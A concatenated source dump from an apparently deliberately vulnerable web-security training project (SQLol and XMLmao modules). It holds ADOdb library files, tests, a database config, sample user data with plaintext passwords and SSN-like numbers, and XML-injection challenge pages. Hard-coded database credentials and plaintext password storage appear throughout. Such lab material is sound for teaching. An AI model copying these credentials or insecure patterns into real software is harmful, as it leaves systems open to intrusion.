| DB_ERROR_NOT_FOUND => 'finns inte', 21 | DB_ERROR_NOT_LOCKED => 'inte låst', 22 | DB_ERROR_SYNTAX => 'syntaxfel', 23 | DB_ERROR_UNSUPPORTED => 'stöds ej', 24 | DB_ERROR_VALUE_COUNT_ON_ROW => 'värde räknat på rad', 25 | DB_ERROR_INVALID_DSN => 'ogiltig DSN', 26 | DB_ERROR_CONNECT_FAILED => 'anslutning misslyckades', 27 | 0 => 'inget fel', // DB_OK 28 | DB_ERROR_NEED_MORE_DATA => 'otillräckligt med data angivet', 29 | DB_ERROR_EXTENSION_NOT_FOUND=> 'utökning hittades ej', 30 | DB_ERROR_NOSUCHDB => 'ingen sådan databas', 31 | DB_ERROR_ACCESS_VIOLATION => 'otillräckliga rättigheter' 32 | ); 33 | 
-------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-th.inc.php: -------------------------------------------------------------------------------- 1 | 3 | $ADODB_LANG_ARRAY = array ( 4 | 'LANG' => 'th', 5 | DB_ERROR => 'error ไม่รู้สาเหตุ', 6 | DB_ERROR_ALREADY_EXISTS => 'มี�?ล้ว', 7 | DB_ERROR_CANNOT_CREATE => 'สร้างไม่ได้', 8 | DB_ERROR_CANNOT_DELETE => 'ลบไม่ได้', 9 | DB_ERROR_CANNOT_DROP => 'drop ไม่ได้', 10 | DB_ERROR_CONSTRAINT => 'constraint violation', 11 | DB_ERROR_DIVZERO => 'หา�?ด้วยสู�?', 12 | DB_ERROR_INVALID => 'ไม่ valid', 13 | DB_ERROR_INVALID_DATE => 'วันที่ เวลา ไม่ valid', 14 | DB_ERROR_INVALID_NUMBER => 'เลขไม่ valid', 15 | DB_ERROR_MISMATCH => 'mismatch', 16 | DB_ERROR_NODBSELECTED => 'ไม่ได้เลือ�?�?านข้อมูล', 17 | DB_ERROR_NOSUCHFIELD => 'ไม่มีฟีลด์นี้', 18 | DB_ERROR_NOSUCHTABLE => 'ไม่มีตารางนี้', 19 | DB_ERROR_NOT_CAPABLE => 'DB backend not capable', 20 | DB_ERROR_NOT_FOUND => 'ไม่พบ', 21 | DB_ERROR_NOT_LOCKED => 'ไม่ได้ล๊อ�?', 22 | DB_ERROR_SYNTAX => 'ผิด syntax', 23 | DB_ERROR_UNSUPPORTED => 'ไม่ support', 24 | DB_ERROR_VALUE_COUNT_ON_ROW => 'value count on row', 25 | DB_ERROR_INVALID_DSN => 'invalid DSN', 26 | DB_ERROR_CONNECT_FAILED => 'ไม่สามารถ connect', 27 | 0 => 'no error', 28 | DB_ERROR_NEED_MORE_DATA => 'ข้อมูลไม่เพียงพอ', 29 | DB_ERROR_EXTENSION_NOT_FOUND=> 'ไม่พบ extension', 30 | DB_ERROR_NOSUCHDB => 'ไม่มีข้อมูลนี้', 31 | DB_ERROR_ACCESS_VIOLATION => 'permissions ไม่พอ' 32 | ); 33 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-uk.inc.php: -------------------------------------------------------------------------------- 1 | 'uk', 7 | DB_ERROR => 'невідома помилка', 8 | DB_ERROR_ALREADY_EXISTS => 'вже існує', 9 | DB_ERROR_CANNOT_CREATE => 'неможливо створити', 10 | DB_ERROR_CANNOT_DELETE => 'неможливо видалити', 11 | DB_ERROR_CANNOT_DROP => 'неможливо знищити (drop)', 12 | DB_ERROR_CONSTRAINT => 
'порушення умов перевірки', 13 | DB_ERROR_DIVZERO => 'ділення на 0', 14 | DB_ERROR_INVALID => 'неправильно', 15 | DB_ERROR_INVALID_DATE => 'неправильна дата чи час', 16 | DB_ERROR_INVALID_NUMBER => 'неправильне число', 17 | DB_ERROR_MISMATCH => 'помилка', 18 | DB_ERROR_NODBSELECTED => 'не вибрано БД', 19 | DB_ERROR_NOSUCHFIELD => 'не існує поле', 20 | DB_ERROR_NOSUCHTABLE => 'не існує таблиця', 21 | DB_ERROR_NOT_CAPABLE => 'СУБД не в стані', 22 | DB_ERROR_NOT_FOUND => 'не знайдено', 23 | DB_ERROR_NOT_LOCKED => 'не заблоковано', 24 | DB_ERROR_SYNTAX => 'синтаксична помилка', 25 | DB_ERROR_UNSUPPORTED => 'не підтримується', 26 | DB_ERROR_VALUE_COUNT_ON_ROW => 'рахівник значень в стрічці', 27 | DB_ERROR_INVALID_DSN => 'неправильна DSN', 28 | DB_ERROR_CONNECT_FAILED => 'з\'єднання неуспішне', 29 | 0 => 'все гаразд', // DB_OK 30 | DB_ERROR_NEED_MORE_DATA => 'надано недостатньо даних', 31 | DB_ERROR_EXTENSION_NOT_FOUND=> 'розширення не знайдено', 32 | DB_ERROR_NOSUCHDB => 'не існує БД', 33 | DB_ERROR_ACCESS_VIOLATION => 'недостатньо прав доступа' 34 | ); 35 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/nbproject/private/config.properties: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SpiderLabs/MCIR/49a292e2c4df90af39b0792d5678579a9f72a6a7/sqlol/includes/adodb/nbproject/private/config.properties -------------------------------------------------------------------------------- /sqlol/includes/adodb/nbproject/private/private.properties: -------------------------------------------------------------------------------- 1 | copy.src.files=false 2 | copy.src.on.open=false 3 | copy.src.target= 4 | index.file=test-sqlite.php 5 | run.as=SCRIPT 6 | url=http://localhost/ 7 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/nbproject/private/private.xml: 
-------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/nbproject/project.properties: -------------------------------------------------------------------------------- 1 | include.path=${php.global.include.path} 2 | php.version=PHP_56 3 | source.encoding=UTF-8 4 | src.dir=. 5 | tags.asp=false 6 | tags.short=false 7 | web.root=. 8 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/nbproject/project.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | org.netbeans.modules.php.project 4 | 5 | 6 | adodb-php 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/pear/auth_adodb_example.php: -------------------------------------------------------------------------------- 1 | 7 |
12 | $dsn, 'table' => 'auth', 'cryptType' => 'none', /* NOTE(review): cryptType 'none' makes PEAR Auth compare the submitted password with the stored column unhashed, so the 'auth' table would hold plaintext passwords; keep this to throwaway demos and store password hashes otherwise - confirm against the Auth documentation. */ 18 | 'usernamecol' => 'username', 'passwordcol' => 'password'); 19 | $a = new Auth("ADOdb", $params, "loginFunction"); 20 | $a->start(); 21 | 22 | if ($a->getAuth()) { 23 | echo "Success"; 24 | // * The output of your site goes here. 25 | } 26 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/pear/readme.Auth.txt: -------------------------------------------------------------------------------- 1 | From: Rich Tango-Lowy (richtl#arscognita.com) 2 | Date: Sat, May 29, 2004 11:20 am 3 | 4 | OK, I hacked out an ADOdb container for PEAR-Auth. The error handling's 5 | a bit of a mess, but all the methods work. 6 | 7 | Copy ADOdb.php to your pear/Auth/Container/ directory. 8 | 9 | Use the ADOdb container exactly as you would the DB 10 | container, but specify 'ADOdb' instead of 'DB': 11 | 12 | $dsn = "mysql://myuser:mypass@localhost/authdb"; 13 | $a = new Auth("ADOdb", $dsn, "loginFunction"); 14 | 15 | 16 | ------------------- 17 | 18 | John Lim adds: 19 | 20 | See http://pear.php.net/manual/en/package.authentication.php 21 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/rsfilter.inc.php: -------------------------------------------------------------------------------- 1 | $v) { 33 | $arr[$k] = ucwords($v); 34 | } 35 | } 36 | $rs = RSFilter($rs,'do_ucwords'); 37 | */ /** Runs the callback $fn once for every row of $rs and returns the recordset. A recordset whose databaseType is not 'array' is first converted with $rs->connection->_rs2rs(); false is returned instead when it has no connection. $fn is either a two-element array (object, method name), invoked as $object->$method($row, $rs), or anything else, invoked as $fn($row, $rs); the row passed is $rs->_array[$i]. Unless $rs->EOF is set, the cursor is then reset to row 0 and $rs->fields to the first row. NOTE(review): $fn is called as a variable function or method, so it must be a fixed, trusted callback and never a name taken from request data. */ 38 | function RSFilter($rs,$fn) 39 | { 40 | if ($rs->databaseType != 'array') { 41 | if (!$rs->connection) return false; 42 | 43 | $rs = $rs->connection->_rs2rs($rs); 44 | } 45 | $rows = $rs->RecordCount(); 46 | for ($i=0; $i < $rows; $i++) { 47 | if (is_array ($fn)) { 48 | $obj = $fn[0]; 49 | $method = $fn[1]; 50 | $obj->$method ($rs->_array[$i],$rs); 51 | } else { 52 | $fn($rs->_array[$i],$rs); 53 | } 54 | 55 | } 56 | if (!$rs->EOF) { 57 | $rs->_currentRow = 0; 58 | $rs->fields = $rs->_array[0]; 59 | } 60 | 61 | return $rs; 62 | } 63 | 
-------------------------------------------------------------------------------- /sqlol/includes/adodb/session/adodb-compress-gzip.php: -------------------------------------------------------------------------------- 1 | _level; 36 | } 37 | 38 | /** Stores the compression level as an int in $this->_level. The 0..9 bounds are expressed only as string assertions. NOTE(review): a string passed to assert() is evaluated as code only on older PHP (deprecated in 7.2, no longer evaluated in 8.0) and assertions can be switched off, so $level is not range-checked here; validate it explicitly if it can come from configuration. 39 | */ 40 | function setLevel($level) { 41 | assert('$level >= 0'); 42 | assert('$level <= 9'); 43 | $this->_level = (int) $level; 44 | } 45 | 46 | /** Returns $this->_min_length, the threshold write() compares strlen($data) against. 47 | */ 48 | function getMinLength() { 49 | return $this->_min_length; 50 | } 51 | 52 | /** Stores $min_length as an int in $this->_min_length; the >= 0 check is a string assertion with the same limits as the ones in setLevel(). 53 | */ 54 | function setMinLength($min_length) { 55 | assert('$min_length >= 0'); 56 | $this->_min_length = (int) $min_length; 57 | } 58 | 59 | /** Applies $level and $min_length through the setters, skipping any argument left null. 60 | */ 61 | function __construct($level = null, $min_length = null) { 62 | if (!is_null($level)) { 63 | $this->setLevel($level); 64 | } 65 | 66 | if (!is_null($min_length)) { 67 | $this->setMinLength($min_length); 68 | } 69 | } 70 | 71 | /** Returns $data unchanged when it is shorter than _min_length, otherwise gzcompress()ed, with _level when one is set. $key is not used. NOTE(review): read() passes every non-empty value to gzuncompress(), so confirm how values stored uncompressed round-trip. 72 | */ 73 | function write($data, $key) { 74 | if (strlen($data) < $this->_min_length) { 75 | return $data; 76 | } 77 | 78 | if (!is_null($this->_level)) { 79 | return gzcompress($data, $this->_level); 80 | } else { 81 | return gzcompress($data); 82 | } 83 | } 84 | 85 | /** Returns gzuncompress($data) for non-empty $data and $data itself otherwise; $key is not used. NOTE(review): no max_length is passed to gzuncompress(), so the inflated size is unbounded; that matters if the session store could hold data written by an untrusted party. 86 | */ 87 | function read($data, $key) { 88 | return $data ? 
gzuncompress($data) : $data; 89 | } 90 | 91 | } 92 | 93 | return 1; 94 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/session/adodb-cryptsession.php: -------------------------------------------------------------------------------- 1 | encrypt($data, $key); 28 | } 29 | 30 | /** 31 | */ 32 | function read($data, $key) { 33 | $md5crypt = new MD5Crypt(); 34 | return $md5crypt->decrypt($data, $key); 35 | } 36 | 37 | } 38 | 39 | return 1; 40 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/session/adodb-encrypt-secret.php: -------------------------------------------------------------------------------- 1 | encrypt($data, $key); 17 | 18 | } 19 | 20 | 21 | function read($data, $key) 22 | { 23 | $sha1crypt = new SHA1Crypt(); 24 | return $sha1crypt->decrypt($data, $key); 25 | 26 | } 27 | } 28 | 29 | 30 | 31 | return 1; 32 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/session/adodb-session-clob.php: -------------------------------------------------------------------------------- 1 | 3 | class MD5Crypt{ 4 | function keyED($txt,$encrypt_key) 5 | { 6 | $encrypt_key = md5($encrypt_key); 7 | $ctr=0; 8 | $tmp = ""; 9 | for ($i=0;$ikeyED($tmp,$key)); 31 | } 32 | 33 | function Decrypt($txt,$key) 34 | { 35 | $txt = $this->keyED(base64_decode($txt),$key); 36 | $tmp = ""; 37 | for ($i=0;$i= 58 && $randnumber <= 64) || ($randnumber >= 91 && $randnumber <= 96)) 54 | { 55 | $randnumber = rand(48,120); 56 | } 57 | 58 | $randomPassword .= chr($randnumber); 59 | } 60 | return $randomPassword; 61 | } 62 | 63 | } 64 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/session/session_schema.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | table for ADOdb session-management 5 | 6 | 7 | session key 8 | 9 | 10 | 11 | 12 | 13 
| 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 |
26 |
27 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/session/session_schema2.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | table for ADOdb session-management 5 | 6 | 7 | session key 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 |
38 |
39 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/tests/test-active-recs2.php: -------------------------------------------------------------------------------- 1 | Connect("localhost","tester","test","test"); 19 | } else 20 | $db = NewADOConnection('oci8://scott:natsoft@/'); 21 | 22 | 23 | $arr = $db->ServerInfo(); 24 | echo "

$db->dataProvider: {$arr['description']}

"; 25 | 26 | $arr = $db->GetActiveRecords('products',' productid<10'); 27 | adodb_pr($arr); 28 | 29 | ADOdb_Active_Record::SetDatabaseAdapter($db); 30 | if (!$db) die('failed'); 31 | 32 | 33 | 34 | 35 | $rec = new ADODB_Active_Record('photos'); 36 | 37 | $rec = new ADODB_Active_Record('products'); 38 | 39 | 40 | adodb_pr($rec->getAttributeNames()); 41 | 42 | echo "
"; 43 | 44 | 45 | $rec->load('productid=2'); 46 | adodb_pr($rec); 47 | 48 | $db->debug=1; 49 | 50 | 51 | $rec->productname = 'Changie Chan'.rand(); 52 | 53 | $rec->insert(); 54 | $rec->update(); 55 | 56 | $rec->productname = 'Changie Chan 99'; 57 | $rec->replace(); 58 | 59 | 60 | $rec2 = new ADODB_Active_Record('products'); 61 | $rec->load('productid=3'); 62 | $rec->save(); 63 | 64 | $rec = new ADODB_Active_record('products'); 65 | $rec->productname = 'John ActiveRec'; 66 | $rec->notes = 22; 67 | #$rec->productid=0; 68 | $rec->discontinued=1; 69 | $rec->Save(); 70 | $rec->supplierid=33; 71 | $rec->Save(); 72 | $rec->discontinued=0; 73 | $rec->Save(); 74 | $rec->Delete(); 75 | 76 | echo "

Affected Rows after delete=".$db->Affected_Rows()."

"; 77 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/tests/test-perf.php: -------------------------------------------------------------------------------- 1 | $v) { 10 | if (strncmp($k,'test',4) == 0) $_SESSION['_db'] = $k; 11 | } 12 | } 13 | 14 | if (isset($_SESSION['_db'])) { 15 | $_db = $_SESSION['_db']; 16 | $_GET[$_db] = 1; 17 | $$_db = 1; 18 | } 19 | 20 | echo "

Performance Monitoring

"; 21 | include_once('testdatabases.inc.php'); 22 | 23 | 24 | function testdb($db) 25 | { 26 | if (!$db) return; 27 | echo "";print_r($db->ServerInfo()); echo " user=".$db->user.""; 28 | 29 | $perf = NewPerfMonitor($db); 30 | 31 | # unit tests 32 | if (0) { 33 | //$DB->debug=1; 34 | echo "Data Cache Size=".$perf->DBParameter('data cache size').'

'; 35 | echo $perf->HealthCheck(); 36 | echo($perf->SuspiciousSQL()); 37 | echo($perf->ExpensiveSQL()); 38 | echo($perf->InvalidSQL()); 39 | echo $perf->Tables(); 40 | 41 | echo "

";
42 | 		echo $perf->HealthCheckCLI();
43 | 		$perf->Poll(3);
44 | 		die();
45 | 	}
46 | 
47 | 	if ($perf) $perf->UI(3);
48 | }
49 | 


--------------------------------------------------------------------------------
/sqlol/includes/adodb/tests/test-xmlschema.php:
--------------------------------------------------------------------------------
 1 | Connect( 'localhost', 'root', '', 'test' ) || die('fail connect1');
12 | 
13 | // Create a schema object on the $db connection; the SQL array is built from it further down.
14 | $schema = new adoSchema( $db ); // NOTE(review): $db is opened above as 'root' with an empty password; local test database only
15 | 
16 | // Upgrade mode is left switched off in this test.
17 | // To upgrade an existing database to the provided schema,
18 | // uncomment the following line:
19 | #$schema->upgradeSchema();
20 | 
21 | print "SQL to build xmlschema.xml:\n
";
22 | // Build the SQL array from xmlschema.xml; this part of the script only dumps it (var_dump below).
23 | $sql = $schema->ParseSchema( "xmlschema.xml" );
24 | 
25 | var_dump( $sql ); // shows the generated statements for inspection
26 | print "
\n"; 27 | 28 | // Execute the SQL on the database 29 | //$result = $schema->ExecuteSchema( $sql ); 30 | 31 | // Finally, clean up after the XML parser 32 | // (PHP won't do this for you!) 33 | //$schema->Destroy(); 34 | 35 | 36 | 37 | print "SQL to build xmlschema-mssql.xml:\n
";
38 | 
39 | $db2 = ADONewConnection('mssql'); // second connection, through the 'mssql' driver
40 | $db2->Connect('','adodb','natsoft','northwind') || die("Fail 2"); // stop the script if the connection fails; NOTE(review): credentials are hard-coded in this test file
41 | 
42 | $db2->Execute("drop table simple_table"); // result not checked, so a failed DROP goes unnoticed; presumably so the test can be rerun, confirm
43 | 
44 | $schema = new adoSchema( $db2 ); // fresh schema object on the second connection
45 | $sql = $schema->ParseSchema( "xmlschema-mssql.xml" ); // SQL array for the MSSQL variant of the schema file
46 | 
47 | print_r( $sql ); // dump the generated statements
48 | print "
\n"; 49 | 50 | $db2->debug=1; 51 | 52 | foreach ($sql as $s) 53 | $db2->Execute($s); 54 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/tests/test2.php: -------------------------------------------------------------------------------- 1 | debug=1; 9 | $access = 'd:\inetpub\wwwroot\php\NWIND.MDB'; 10 | $myDSN = 'PROVIDER=Microsoft.Jet.OLEDB.4.0;' 11 | . 'DATA SOURCE=' . $access . ';'; 12 | 13 | echo "

PHP ",PHP_VERSION,"

"; 14 | 15 | $db->Connect($myDSN) || die('fail'); 16 | 17 | print_r($db->ServerInfo()); 18 | 19 | try { 20 | $rs = $db->Execute("select $db->sysTimeStamp,* from adoxyz where id>02xx"); 21 | print_r($rs->fields); 22 | } catch(exception $e) { 23 | print_r($e); 24 | echo "

Date m/d/Y =",$db->UserDate($rs->fields[4],'m/d/Y'); 25 | } 26 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/tests/test3.php: -------------------------------------------------------------------------------- 1 | Connect('','scott','natsoft'); 23 | $db->debug=1; 24 | 25 | $cnt = $db->GetOne("select count(*) from adoxyz"); 26 | $rs = $db->Execute("select * from adoxyz order by id"); 27 | 28 | $i = 0; 29 | foreach($rs as $k => $v) { 30 | $i += 1; 31 | echo $k; adodb_pr($v); 32 | flush(); 33 | } 34 | 35 | if ($i != $cnt) die("actual cnt is $i, cnt should be $cnt\n"); 36 | 37 | 38 | 39 | $rs = $db->Execute("select bad from badder"); 40 | 41 | } catch (exception $e) { 42 | adodb_pr($e); 43 | $e = adodb_backtrace($e->trace); 44 | } 45 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/tests/test5.php: -------------------------------------------------------------------------------- 1 | debug=1; 25 | $conn->PConnect("localhost","root","","xphplens"); 26 | print $conn->databaseType.':'.$conn->GenID().'
'; 27 | } 28 | 29 | if (0) { 30 | $conn = ADONewConnection("oci8"); // create a connection 31 | $conn->debug=1; 32 | $conn->PConnect("falcon", "scott", "tiger", "juris8.ecosystem.natsoft.com.my"); // connect to MySQL, testdb 33 | print $conn->databaseType.':'.$conn->GenID(); 34 | } 35 | 36 | if (0) { 37 | $conn = ADONewConnection("ibase"); // create a connection 38 | $conn->debug=1; 39 | $conn->Connect("localhost:c:\\Interbase\\Examples\\Database\\employee.gdb", "sysdba", "masterkey", ""); // connect to MySQL, testdb 40 | print $conn->databaseType.':'.$conn->GenID().'
'; 41 | } 42 | 43 | if (0) { 44 | $conn = ADONewConnection('postgres'); 45 | $conn->debug=1; 46 | @$conn->PConnect("susetikus","tester","test","test"); 47 | print $conn->databaseType.':'.$conn->GenID().'
'; 48 | } 49 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/tests/test_rs_array.php: -------------------------------------------------------------------------------- 1 | InitArray($array,$typearr); 17 | 18 | while (!$rs->EOF) { 19 | print_r($rs->fields);echo "
"; 20 | $rs->MoveNext(); 21 | } 22 | 23 | echo "


1 Seek
"; 24 | $rs->Move(1); 25 | while (!$rs->EOF) { 26 | print_r($rs->fields);echo "
"; 27 | $rs->MoveNext(); 28 | } 29 | 30 | echo "
2 Seek
"; 31 | $rs->Move(2); 32 | while (!$rs->EOF) { 33 | print_r($rs->fields);echo "
"; 34 | $rs->MoveNext(); 35 | } 36 | 37 | echo "
3 Seek
"; 38 | $rs->Move(3); 39 | while (!$rs->EOF) { 40 | print_r($rs->fields);echo "
"; 41 | $rs->MoveNext(); 42 | } 43 | 44 | 45 | 46 | die(); 47 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/tests/testcache.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | PConnect('nwind'); 22 | } else { 23 | $db = ADONewConnection('mysql'); 24 | $db->PConnect('mangrove','root','','xphplens'); 25 | } 26 | if (isset($cache)) $rs = $db->CacheExecute(120,'select * from products'); 27 | else $rs = $db->Execute('select * from products'); 28 | 29 | $arr = $rs->GetArray(); 30 | print sizeof($arr); 31 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/tests/testgenid.php: -------------------------------------------------------------------------------- 1 | Execute("drop table $table"); 17 | //$db->debug=true; 18 | 19 | $ctr = 5000; 20 | $lastnum = 0; 21 | 22 | while (--$ctr >= 0) { 23 | $num = $db->GenID($table); 24 | if ($num === false) { 25 | print "GenID returned false"; 26 | break; 27 | } 28 | if ($lastnum + 1 == $num) print " $num "; 29 | else { 30 | print " $num "; 31 | flush(); 32 | } 33 | $lastnum = $num; 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/tests/testpear.php: -------------------------------------------------------------------------------- 1 | setFetchMode(ADODB_FETCH_ASSOC); 27 | $rs = $db->Query('select firstname,lastname from adoxyz'); 28 | $cnt = 0; 29 | while ($arr = $rs->FetchRow()) { 30 | print_r($arr); 31 | print "
"; 32 | $cnt += 1; 33 | } 34 | 35 | if ($cnt != 50) print "Error in \$cnt = $cnt"; 36 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/tests/time.php: -------------------------------------------------------------------------------- 1 | 6 | " ); 16 | echo( "Converted: $convertedDate" ); //why is string returned as one day (3 not 4) less for this example?? 17 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/tests/xmlschema-mssql.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | id 15 | 16 | 17 | id 18 | 19 | 20 | 21 |
22 | 23 | SQL to be executed only on specific platforms 24 | 25 | insert into mytable ( row1, row2 ) values ( 12, 'postgres stuff' ) 26 | 27 | 28 | insert into mytable ( row1, row2 ) values ( 12, 'mysql stuff' ) 29 | 30 | 31 | INSERT into simple_table ( name, description ) values ( '12', 'Microsoft stuff' ) 32 | 33 | 34 |
-------------------------------------------------------------------------------- /sqlol/includes/adodb/tests/xmlschema.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | An integer row that's a primary key and autoincrements 6 | 7 | 8 | 9 | 10 | A 16 character varchar row that can't be null 11 | 12 | 13 | 14 | row1 15 | row2 16 | 17 |
18 | 19 | SQL to be executed only on specific platforms 20 | 21 | insert into mytable ( row1, row2 ) values ( 12, 'postgres stuff' ) 22 | 23 | 24 | insert into mytable ( row1, row2 ) values ( 12, 'mysql stuff' ) 25 | 26 | 27 | insert into mytable ( row1, row2 ) values ( 12, 'Microsoft stuff' ) 28 | 29 | 30 | 31 | 32 |
33 |
-------------------------------------------------------------------------------- /sqlol/includes/adodb/x.php: -------------------------------------------------------------------------------- 1 | connect('localhost', 'root', 'C0yote71', 'mantis_13x'); 6 | 7 | $t = 'mantis_user_table'; 8 | $c = array('username' => 'test'); 9 | print $db->getinsertsql($t, $c) . PHP_EOL; 10 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/xmlschema.dtd: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | 6 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | ] > -------------------------------------------------------------------------------- /sqlol/includes/adodb/xmlschema03.dtd: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | ]> -------------------------------------------------------------------------------- /sqlol/includes/adodb/xsl/remove-0.2.xsl: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 8 | 9 | 10 | ADODB XMLSchema 11 | http://adodb-xmlschema.sourceforge.net 12 | 13 | 14 | 15 | Uninstallation Schema 16 | 17 | 18 | 19 | 0.2 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/xsl/remove-0.3.xsl: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 8 | 9 | 10 | ADODB XMLSchema 11 | http://adodb-xmlschema.sourceforge.net 12 
| 13 | 14 | 15 | Uninstallation Schema 16 | 17 | 18 | 19 | 0.3 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | -------------------------------------------------------------------------------- /sqlol/includes/database.config.php: -------------------------------------------------------------------------------- 1 | . 14 | */ 15 | 16 | //Choose the appropriate type of database here 17 | 18 | //Choose me for MySQL 19 | $dbtype = 'mysqli'; 20 | $server = '127.0.0.1'; 21 | $port = '3306'; 22 | $username = 'root'; 23 | $password = 'default_mcir_db_password'; 24 | $database = 'sqlol'; 25 | $persist = ''; 26 | 27 | $hostspec = $username.':'.$password.'@'.$server.':'.$port; 28 | 29 | 30 | /*//Choose me for PostgreSQL 31 | $dbtype = 'postgres'; 32 | $server = '127.0.0.1'; 33 | $port = '5432'; 34 | $username = 'postgres'; 35 | $password = 'postgres'; 36 | $database = 'sqlol'; 37 | $persist = ''; 38 | 39 | $hostspec = $username.':'.$password.'@'.$server.':'.$port; 40 | */ 41 | 42 | /*//Choose me for SQLite 43 | $dbtype = 'sqlite'; 44 | $hostspec = urlencode('c:\path\to\sqlite.db'); 45 | $database = ''; //Keep this value set to null for SQLite 46 | $persist = ''; //Don't persist, SQLite is bad at concurrent connections 47 | */ 48 | 49 | ?> 50 | -------------------------------------------------------------------------------- /sqlol/includes/nav.inc.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 |
15 | | INSERT || UPDATE || DELETE || SELECT || Custom || Challenges |
16 |

RESET

17 |
18 | 19 |
20 |
21 |
22 |
23 | -------------------------------------------------------------------------------- /sqlol/index.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | 14 | header('Location: select.php'); 15 | 16 | ?> 17 | -------------------------------------------------------------------------------- /xmlmao/data.xml: -------------------------------------------------------------------------------- 1 | 12 | 13 | 14 | 15 | 16 | 1 17 | jsmiley 18 | jsmiley 19 | 123-456-7890 20 | 21 | 22 | 23 | 2 24 | cmacrunfast 25 | speedsupto3 26 | 603-478-4115 27 | 28 | 29 | 30 | 3 31 | mitch 32 | @lltogether 33 | 222-222-2222 34 | 35 | 36 | 37 | 38 | jsmiley 39 | 111-22-3333 40 | 41 | 42 | cmacrunfast 43 | 123-45-6789 44 | 45 | 46 | mitch 47 | 010-10-1010 48 | 49 | 50 | 51 | -------------------------------------------------------------------------------- /xmlmao/includes/nav.inc.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 |
| XPath Injection || XML Injection || XSL Injection || Challenges |
15 |
16 |
17 |
18 |
19 | 20 | -------------------------------------------------------------------------------- /xmlmao/index.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | 14 | header('Location: xpath.php'); 15 | 16 | ?> 17 | -------------------------------------------------------------------------------- /xmlmao/xmli_challenges/challenge0.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 | 16 | XMLmao - XML Injection Challenge 0 - Hello, world! 17 | 18 | 19 | 20 |

XMLmao - XML Injection Challenge 0 - Hello, world!


21 | 22 |
23 |
24 |
25 |
26 | 27 | You must perform the simplest of XML injection attacks.
28 |
29 | Your objective is to inject an additional "data" tag into the XML. 30 | 31 |
32 | PARAMETERS:
33 | Injection Type - CDATA-wrapped value
34 | Sanitization - None
35 | Output - All results, verbose errors, xml shown
36 | 
37 | 38 |
39 |
40 | 41 | 42 | 43 | 44 | Injection String:
45 | 46 |
47 |
48 | 49 | 50 | -------------------------------------------------------------------------------- /xmlmao/xmli_challenges/challenge1.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 | 16 | XMLmao - XML Injection Challenge 1 - There Can Be Only One 17 | 18 | 19 | 20 |

XMLmao - XML Injection Challenge 1 - There Can Be Only One


21 | 22 |
23 |
24 |
25 |
